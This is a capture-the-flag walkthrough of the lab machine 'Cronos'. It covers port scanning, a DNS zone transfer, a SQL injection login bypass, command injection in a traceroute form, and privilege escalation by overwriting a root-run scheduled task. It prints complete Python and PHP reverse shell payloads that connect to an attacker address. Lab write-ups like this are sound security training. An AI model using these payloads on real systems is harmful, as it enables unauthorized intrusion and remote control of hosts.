Cronos
Overview
Initial Foothold : SQL Injection along with Command injection
Privilege Escalation : Schedule Tasks
Enumeration
Starting with port scanning
Port Scanning
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Cronos
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.13 (92%), Linux 3.2 - 4.9 (92%), Linux 3.12 (90%), Linux 3.13 or 4.2 (90%), Linux 3.16 (90%), Linux 3.16 - 4.6 (90%), Linux 3.18 (90%), Linux 3.8 - 3.11 (90%), Linux 4.2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Interesting Port 53 was open which tells that dns server is running
Lets start with dns enumeration
DNS Enumeration
First of all add the hostname of the machine which is cronos.htb in /etc/hosts file
Now lets perform zone transfer
With the help of zone transfer we can obtain potential subdomains of the site running
If you want to learn why and what is zone transfer refer to
Zone transfer using dig command
dig axfr cronos.htb @10.10.10.13
Got some subdomains fo the hostname cronos.htb
lets add them in our /etc/hosts file
That's all for dns enumeration we got the information we needed
Web Enumeration
Lets visit the webpage
Simple Webpage was running
Used directory bruteforce but got nothing
but from our previous dns enumeration we had got some subdomain
Lets use them
at admin.cronos we got login page
We dont have creds lets try sql injection on this login page
and we successfully logged in using
Username : admin'or'1'='1; #
password : password
The above sql injection got us logged in as admin user
Exploitation
After logging we got webpage which do traceroute
There may be possibilty of command injection in this because this was executing on server side
lets do command injection
Using query 8.8.8.8;ls we got the above result
hence it is confirmed that there is command injection vulnerabilty in the above webpage
Lets use this to get reverse shell
Now use reverse shell from pentestmonkey site
Try python reverse shell command
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.40",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'Enter the above command in the textbox of the webpage and setup listener on port 1234
And got the reverse shell
Grab the user.txt file
Privilege Escalation
After some enumeration got that there was schedule task running with root permission which the user can overwrite
Lets overwrite the file
with our reverse shellcode and setup listener
<?php
$sock=fsockopen("10.10.14.40",4444);exec("/bin/sh -i <&3 >&3 2>&3");
After some time the task was executed and we got the root shell on port 4444
That's all for this box
Good Bye :)
Last updated
Was this helpful?